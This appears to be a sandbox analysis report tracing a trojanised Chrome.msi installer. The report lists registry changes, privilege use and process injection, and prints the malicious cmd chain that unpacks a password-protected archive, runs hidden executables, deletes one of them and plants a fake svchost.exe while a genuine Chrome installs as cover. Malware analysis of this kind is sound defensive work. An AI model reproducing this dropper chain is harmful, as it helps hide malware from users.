Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\ = "IGoogleUpdateCore" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\NumMethods\ = "16" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\VERSIONINDEPENDENTPROGID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\Elevation C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1C4CDEFF-756A-4804-9E77-3E8EB9361016}\ProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\NumMethods\ = "11" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromePDF\shell\open\command C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.html C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\ = "IAppBundleWeb" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\Elevation\Enabled = "1" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\PROGID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\ProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\ProgID\ = "GoogleUpdate.CredentialDialogMachine.1.0" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Packas\scrok.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Smart\setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3884 wrote to memory of 2016 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 3884 wrote to memory of 2016 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 3884 wrote to memory of 3804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3884 wrote to memory of 3804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3884 wrote to memory of 3804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3804 wrote to memory of 4468 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 4468 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 4468 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 4468 wrote to memory of 4488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 4488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 4488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 4468 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 4468 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 4468 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 4468 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 1744 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 4468 wrote to memory of 1972 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 1972 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4468 wrote to memory of 104 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 104 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 4468 wrote to memory of 4776 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 4468 wrote to memory of 4776 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 4968 wrote to memory of 3780 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 4968 wrote to memory of 3780 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 4968 wrote to memory of 3780 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 4776 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 4776 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 4776 wrote to memory of 820 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 4468 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 4468 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 4468 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3780 wrote to memory of 4680 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 4680 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 4680 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 416 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 416 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 416 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 1388 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 1388 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3780 wrote to memory of 1388 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 1668 wrote to memory of 4928 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe
PID 1668 wrote to memory of 4928 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe
PID 1668 wrote to memory of 4928 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe
PID 4928 wrote to memory of 5020 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4928 wrote to memory of 5020 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4928 wrote to memory of 5020 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4928 wrote to memory of 3716 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4928 wrote to memory of 3716 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4928 wrote to memory of 3716 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 3716 wrote to memory of 3064 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3716 wrote to memory of 3064 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3716 wrote to memory of 4052 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3716 wrote to memory of 4052 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3716 wrote to memory of 4860 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3716 wrote to memory of 4860 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 4928 wrote to memory of 4868 N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Chrome.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 5E8D8B1D1FBE260C26C58DBD5A8CF5C7

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /c timeout /nobreak /t 7 & C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData & C:\ProgramData\Packas\scrok.exe & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & timeout /nobreak /t 2 & C:\ProgramData\Smart\TjNkNpAilaYvt.exe start & C:\ProgramData\Packas\scrok.exe & del C:\ProgramData\Packas\scrok.exe & C:\ProgramData\setup\setup.exe

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 7

C:\ProgramData\setup\aa.exe

C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 2

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe start

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

"C:\ProgramData\Smart\TjNkNpAilaYvt.exe"

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\setup.exe

"C:\ProgramData\Smart\setup.exe"

C:\ProgramData\setup\setup.exe

C:\ProgramData\setup\setup.exe

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zMTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zMTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MTExRDBBMzYtMDA3Ni00Mjk0LTg2MDEtNzAzQzVBNDJBQjM4fSIgdXNlcmlkPSJ7MEQ0QTE0OTgtMDBBOC00OEUwLUI0NzQtQ0JBMkQ5NTUxNjM5fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0EyRDU3NUVGLTcyNUItNDg3Mi1CQkQwLUFFRDQyRDkwMDdEMH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9Ins0MzBGRDREMC1CNzI5LTRGNjEtQUEzNC05MTUyNjQ4MTc5OUR9IiB2ZXJzaW9uPSIxLjMuMzYuMzcxIiBuZXh0dmVyc2lvbj0iMS4zLjM2LjMxMiIgbGFuZz0iemgtQ04iIGJyYW5kPSIiIGNsaWVudD0iIiBpaWQ9Ins5RjBDMUY0NC0xQzUwLTM5NkEtNDgzQS0wOERBNDg5NkZGMEJ9Ij48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBpbnN0YWxsX3RpbWVfbXM9IjUzMSIvPjwvYXBwPjwvcmVxdWVzdD4

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{111D0A36-0076-4294-8601-703C5A42AB38}"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

